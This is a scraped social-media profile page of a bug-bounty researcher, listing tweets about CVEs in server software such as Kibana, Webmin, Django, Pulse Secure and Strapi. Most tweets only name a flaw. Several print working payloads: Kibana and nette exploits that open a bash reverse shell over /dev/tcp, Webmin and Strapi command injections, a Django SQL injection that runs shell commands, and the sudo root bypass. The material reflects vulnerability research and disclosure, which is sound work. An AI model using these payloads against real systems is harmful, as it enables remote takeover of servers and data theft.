chybeta Profile Banner
chybeta Profile
chybeta

@chybeta

Followers
13,178
Following
2,234
Media
190
Statuses
445

looking forward to bug bounty collaboration

Joined August 2017
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@chybeta
chybeta
29 days
19.4.13 - 24.4.13
Tweet media one
1
0
6
@chybeta
chybeta
4 years
CVE-2020-5902 allows for unauthenticated attackers execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. 👇just an example
11
311
780
@chybeta
chybeta
2 years
CVE-2022-36804 Bitbucket Server RCE
Tweet media one
10
145
749
@chybeta
chybeta
5 years
CVE-2019-15642 another Webmin Remote Code Execution (authenticated) 1. set User-Agent as webmin 2. set Authorization 3. set payload: OBJECT CGI;print "Content-Type: chybeta\n\n";$cmd=`id`;print "$cmd"; 4. post to /rpc.cgi
10
362
723
@chybeta
chybeta
5 years
CVE-2019-8451 Unauthorized SSRF via REST API /plugins/servlet/gadgets/makeRequest use @ to bypass the whitelisting ! 👇 reading resources @orange_8361
1
338
646
@chybeta
chybeta
5 years
CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip
@chybeta
chybeta
5 years
POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Tweet media one
3
110
235
5
274
595
@chybeta
chybeta
5 years
writeup: ..%3B -> tomcat manager -> getshell #bugbounty #BugBountyTips #bugbountytip
Tweet media one
Tweet media two
Tweet media three
Tweet media four
7
252
579
@chybeta
chybeta
4 years
Apache Tomcat AJP Vulnerability (CNVD-2020-10487/CVE-2020-1938 ) .This vulnerability was discovered by a security researcher of Chaitin Tech . You can read any webapps files or include a file to RCE .JUST A POC-GIF with no DETAILS Tomcat has fix this vulnerability ,UPDATE!
19
273
535
@chybeta
chybeta
2 years
CVE-2022-1388
Tweet media one
6
68
526
@chybeta
chybeta
11 months
%00
Tweet media one
Tweet media two
11
58
504
@chybeta
chybeta
4 years
😂
Tweet media one
10
113
499
@chybeta
chybeta
5 years
Front-End VS Back-End.
Tweet media one
6
138
480
@chybeta
chybeta
3 years
CVE-2021-40438 Apache mod_proxy SSRF via uri-path demo: analysis: 1、 2、 (chinese)
Tweet media one
Tweet media two
4
165
446
@chybeta
chybeta
3 years
after Apache HTTPd Path Traversal (CVE-2021-42013/41773) I review the CVE-2018-19052 Lighttpd path traversal (credit @orange_8361 )
Tweet media one
Tweet media two
3
125
436
@chybeta
chybeta
3 years
CVE-2021-21972 VMware vCenter RCE
Tweet media one
4
98
416
@chybeta
chybeta
3 years
bypass trick in Flask
Tweet media one
Tweet media two
4
123
408
@chybeta
chybeta
3 years
CVE-2021-22986 F5 BIG-IP/BIG-IQ iControl REST RCE
Tweet media one
Tweet media two
4
144
391
@chybeta
chybeta
3 years
Laravel <= V8.4.2 debug mode RCE
Tweet media one
0
133
366
@chybeta
chybeta
4 years
CVE-2020-8218 Pulse Connect Secure post-auth RCE https://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
1
183
362
@chybeta
chybeta
4 years
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method however there are lots of no-auth mongo-express ... shodan: poc:
3
183
357
@chybeta
chybeta
8 months
CVE-2023-41892 Craftcms RCE using PHP reflection
Tweet media one
4
59
343
@chybeta
chybeta
5 years
Analysis for【CVE-2019-5418】File Content Disclosure on Rails
1
185
337
@chybeta
chybeta
2 years
CVE-2022-33980: Apache Commons Configuration RCE
Tweet media one
1
102
320
@chybeta
chybeta
3 years
CVE-2021-40346 HAProxy HTTP Smuggling and ACL bypass analysis 1. 2. demo:
Tweet media one
Tweet media two
1
107
318
@chybeta
chybeta
3 years
CVE-2021-42013 & CVE-2021-41773 Apache HTTPd  Path Traversal and Remote Code Execution
Tweet media one
Tweet media two
4
88
310
@chybeta
chybeta
7 months
CVE-2023-46747 request smuggling to RCE
@chybeta
chybeta
7 months
K000137353: BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747
Tweet media one
1
9
63
4
57
308
@chybeta
chybeta
5 years
EXP for CVE-2019-14234 Django JSONField SQL Injection Step1: ?data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) -- OR .... Step2: ?data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping ' -- OR ...
Tweet media one
Tweet media two
3
154
296
@chybeta
chybeta
3 years
Apache Skywalking GraphQL SQL Injection h2 SQLI => RCE analysis:
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
103
298
@chybeta
chybeta
4 years
CVE-2020-5410 Directory Traversal with spring-cloud-config-server advisory: analysis:
0
104
289
@chybeta
chybeta
3 years
CVE-2021-34429 Jetty WEB-INF infol leak simple analysis:
Tweet media one
5
86
281
@chybeta
chybeta
3 years
CVE-2021-26086 Pre-Auth Limited Remote File Read/Include in Jira Software Server details:
Tweet media one
Tweet media two
2
106
273
@chybeta
chybeta
4 years
CVE-2020-15227 PHP framework nette callback RCE POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1
Tweet media one
Tweet media two
1
119
258
@chybeta
chybeta
2 years
CVE-2021-43557 Apache APISIX Path traversal in request_uri variable
Tweet media one
0
42
254
@chybeta
chybeta
5 years
CVE-2019-3799: Directory Traversal with spring-cloud-config-server
1
90
245
@chybeta
chybeta
3 years
CVE-2021-41163 Discourse RCE via malicious SNS subscription payload advisory: analysis: 1、 2、 (chinese)
Tweet media one
0
94
244
@chybeta
chybeta
4 years
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:
Tweet media one
Tweet media two
3
110
231
@chybeta
chybeta
5 years
POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Tweet media one
3
110
235
@chybeta
chybeta
4 years
Apache Struts RCE: S2-059 / CVE-2019-0230 Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
4
99
235
@chybeta
chybeta
4 years
CVE-2020-1947 Remote Code Execution (RCE) Through YAML Deserialization in Apache ShardingSphere
Tweet media one
Tweet media two
2
91
230
@chybeta
chybeta
3 years
Apache NiFi Remote Code Exectuion (RCE)
2
74
226
@chybeta
chybeta
4 years
CVE-2020-5412 Full-Read SSRF in spring-cloud-netflix-hystrix-dashboard
2
79
226
@chybeta
chybeta
4 years
CVE-2020-2551 WebLogic RCE via IIOP protocol.
2
93
223
@chybeta
chybeta
4 months
CVE-2023-22527 Confluence SSTI RCE
Tweet media one
0
27
227
@chybeta
chybeta
3 years
CVE-2021-30179 Apache Dubbo RCE via Java deserialization in the Generic filter details 1. 2.
1
93
214
@chybeta
chybeta
3 years
CVE-2020-13942 Apache Unomi pre-auth RCE (bypass CVE-2020-11975 )
2
46
206
@chybeta
chybeta
5 years
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property Analsyis:
Tweet media one
1
87
203
@chybeta
chybeta
4 years
backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");
Tweet media one
4
80
199
@chybeta
chybeta
2 months
CVE-2024-23917 Teamcity < 2023.11.3 unauth RCE yes, CVE-2024-23917 , not CVE-2024-27198
Tweet media one
4
30
204
@chybeta
chybeta
3 years
CVE-2020-28949/CVE-2020-28948 RCE on Drupal via Phar Deserialization in PEAR Archive_Tar library. Poc: phar => PHAR PHAR://malicious_file.phar
Tweet media one
Tweet media two
0
63
202
@chybeta
chybeta
4 years
🌚the patch....
Tweet media one
Tweet media two
@80vul
heige
4 years
CVE-2020-14883 fix have been bypass
1
34
79
8
61
197
@chybeta
chybeta
3 years
CVE-2020-10148 SolarWinds Orion API RCE 👇POC
Tweet media one
Tweet media two
1
89
192
@chybeta
chybeta
3 years
CVE-2021-21402 Unauthenticated abritrary file read in Jellyfin
Tweet media one
2
62
189
@chybeta
chybeta
3 years
CVE-2021-39115 Jira Service Management Server Template Injection in Email Templates
1
50
187
@chybeta
chybeta
4 years
CVE-2020-7961 liferay-portal RCE: Unauthenticated Remote code execution via JSONWS (LPS-97029)
2
88
177
@chybeta
chybeta
5 years
CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE PHP template injection
Tweet media one
Tweet media two
Tweet media three
4
62
175
@chybeta
chybeta
4 years
vBulletin 5.x RCE Blog: Slide:
2
64
178
@chybeta
chybeta
4 years
CVE-2020-10204 Nexus Repository Manager 3 - Remote Code Execution Well, EL Injection
1
59
168
@chybeta
chybeta
3 years
CVE-2021-33193 Request splitting via HTTP/2 method injection and mod_proxy (Reported by @albinowax ) demo: article: 1、 2、
Tweet media one
2
66
171
@chybeta
chybeta
3 years
CVE-2021-30128 Apache OFBiz RCE
0
69
170
@chybeta
chybeta
4 years
POC: http://localhost:8000/test/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v%24instance)) from dual) is null%20 OR (1%2B1 analysis:
Tweet media one
@chybeta
chybeta
4 years
CVE-2020-9402 Django SQLI: Potential SQL injection via tolerance parameter in GIS functions and aggregates on Oracle advisory: fix commit:
Tweet media one
Tweet media two
Tweet media three
0
33
69
0
90
162
@chybeta
chybeta
3 years
SonicWALL SSL-VPN cgi-bin/jarrewrite.sh shellshock RCE
Tweet media one
@chybeta
chybeta
3 years
The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh. nnnnday - -
Tweet media one
1
7
30
1
58
163
@chybeta
chybeta
4 years
CVE-2020-15148 Yii 2 yii\db\BatchQueryResult RCE
Tweet media one
Tweet media two
0
43
162
@chybeta
chybeta
3 years
Gitlab 13.8.2 (2021-02-01) fix DNS rebinding protection bypass when allowing an IP address in Outbound Requests setting. Gitlab SSRF ~ analysis:
Tweet media one
Tweet media two
Tweet media three
3
58
156
@chybeta
chybeta
5 years
phpstudy backdoor RCE
4
47
160
@chybeta
chybeta
3 years
CVE-2020-29453 Pre-Authorization Limited Arbitrary File Read in Jira Server
Tweet media one
2
50
156
@chybeta
chybeta
5 years
bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip
Tweet media one
7
51
154
@chybeta
chybeta
4 years
CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.
3
71
148
@chybeta
chybeta
3 years
CVE-2021-25281 wheel_async unauth access + CVE-2021-25282 salt.wheel.pillar_roots.write directory traversal something:
Tweet media one
Tweet media two
1
52
145
@chybeta
chybeta
3 years
CVE-2021-30461 voipmonitor RCE
Tweet media one
0
59
146
@chybeta
chybeta
2 years
CVE-2021-43798 Grafana path traversal AND BYPASS Nginx 400 Bad Request ~
Tweet media one
@chybeta
chybeta
2 years
Grafana
Tweet media one
2
5
53
7
34
143
@chybeta
chybeta
4 years
CVE-2019-3395 Confluence Pre-Auth SSRF via WebDAV
Tweet media one
Tweet media two
1
44
143
@chybeta
chybeta
19 days
It is a difficult thing to teach other people RCE =.=
Tweet media one
12
0
140
@chybeta
chybeta
8 months
CVE-2023-35813 sitecore RCE
Tweet media one
@codewhitesec
CODE WHITE GmbH
8 months
Exploiting ASP .NET TemplateParser to get RCE in Sitecore (CVE-2023-35813) and SharePoint (CVE-2023-33160) by @mwulftange in two parts: part 1 at is live now and part 2 will follow in a few days...stay tuned!
0
108
259
1
25
137
@chybeta
chybeta
5 years
CVE-2019-3394 : src=\"/packages/../web.xml\" full details analysis: @yigeban
@chybeta
chybeta
5 years
Confluence Server and Confluence Data Center - Local File Disclosure - CVE-2019-3394
Tweet media one
1
7
18
2
60
127
@chybeta
chybeta
2 years
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
Tweet media one
4
32
126
@chybeta
chybeta
3 years
CVE-2021-21975 VMware vRealize Operations Manager API SSRF
Tweet media one
4
34
123
@chybeta
chybeta
4 years
CVE-2020-5405: Directory Traversal with spring-cloud-config-server. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. Advisory:
0
35
117
@chybeta
chybeta
4 years
CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) jython xxx 18983 command super_secret "ls -la"
Tweet media one
Tweet media two
0
57
118
@chybeta
chybeta
4 years
CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:
Tweet media one
0
55
118
@chybeta
chybeta
5 years
CVE-2019-5475 Nexus Repository Manager 2 - OS Command Injection (authenticated) Security Advisories Fix:
1
50
117
@chybeta
chybeta
1 year
CVE-2022-23529 🤣
@testanull
Janggggg
1 year
Hey look, I've just found a seRioUs vulnerability in Java System.out.println() method Just by executing System.out.println() with a malicious Object with the method toString() is override, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)
Tweet media one
35
96
626
3
28
120
@chybeta
chybeta
3 years
pyspider unauth RCE
1
31
115
@chybeta
chybeta
4 years
CVE-2020-1937 Apache Kylin SQL injection vulnerability
Tweet media one
Tweet media two
Tweet media three
0
56
111
@chybeta
chybeta
4 years
CVE-2020-9496 Apache OFBiz PRE-AUTH RCE advisory:
0
45
112
@chybeta
chybeta
6 months
analysis for CVE-2023-22518 confluence unauth RCE ​
Tweet media one
Tweet media two
@shimizukawasak
ShimizuKawasaki
6 months
CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server Don’t use and never use this vulnerability lightly,because it is a master of data cleaning
5
57
227
1
23
106
@chybeta
chybeta
3 years
method 1 : SSRF -> Token -> RCE
@chybeta
chybeta
3 years
CVE-2021-22986 F5 BIG-IP/BIG-IQ iControl REST RCE
Tweet media one
Tweet media two
4
144
391
2
36
109
@chybeta
chybeta
2 years
CVE-2022-39135 Apache Calcite Avatica XXE
Tweet media one
2
27
107
@chybeta
chybeta
3 years
CVE-2021-25646 Apache Druid Remote Code Execution. analysis:
Tweet media one
Tweet media two
Tweet media three
1
40
104
@chybeta
chybeta
4 years
CVE-2020-25592 Any value for "eauth"/"token” allow a user to bypass auth and make calls to Salt SSH. CVE-2020-16846 A user could use shell injections with the Salt API using the SSH Client. 25592+16846=Unauth RCE 分析
0
35
102
@chybeta
chybeta
7 months
XXE?
Tweet media one
@haqpl
Maciej Piechota
7 months
Somebody tell me this is not a dream 😅 Yay, I was awarded a $200,000 🔥 bounty on @Hacker0x01 ! #TogetherWeHitHarder
239
163
2K
7
3
99
@chybeta
chybeta
3 years
CVE-2020-29448 Pre-Authorization Limited Arbitrary File Read in Confluence Server
Tweet media one
0
48
98
@chybeta
chybeta
4 years
CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662
Tweet media one
1
44
99
@chybeta
chybeta
4 years
CVE-2019-19118: Privilege escalation in the Django admin.
Tweet media one
0
35
94
@chybeta
chybeta
4 years
CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}
Tweet media one
Tweet media two
2
41
95
@chybeta
chybeta
5 years
CVE-2019-14287 sudo -u#-1 xxxx This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.
Tweet media one
0
32
96
@chybeta
chybeta
5 years
How to hack windows? Just upload a fake CVE-2019-0708 POC and wait script kids run it ...😎
6
20
91
@chybeta
chybeta
3 years
DIFFERENT + MIX = SSRF BYPASS
Tweet media one
@thebinarybot
Nithin 🦹‍♂️
3 years
Bypass SSRF protection with different encodings. A thread. 🧵👇
14
285
701
0
22
93
@chybeta
chybeta
3 years
CVE-2020-8277 Node.js Denial of Service through DNS request
0
30
91
@chybeta
chybeta
1 year
seriously ??? 500🔪???
Tweet media one
14
0
86
@chybeta
chybeta
2 years
Tweet media one
5
0
84
@chybeta
chybeta
2 months
In 2023, I found RCE in xxx[.]target[.]com and then the server take down But in 2024, I found new RCE in xxx-stage[.]target[.]com 🤣
Tweet media one
4
3
87